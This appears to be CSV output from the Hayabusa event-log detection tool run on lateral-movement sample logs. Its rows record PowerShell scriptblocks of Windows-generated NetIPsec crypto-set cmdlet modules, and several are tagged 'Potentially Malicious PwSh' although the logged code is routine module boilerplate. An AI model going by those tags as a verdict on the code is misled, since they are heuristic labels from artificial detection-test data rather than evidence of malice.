$__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetNam",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"e )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"e )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.612 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.612 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.614 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.615 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.615 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.616 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.616 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.659 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' -Alias '*' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 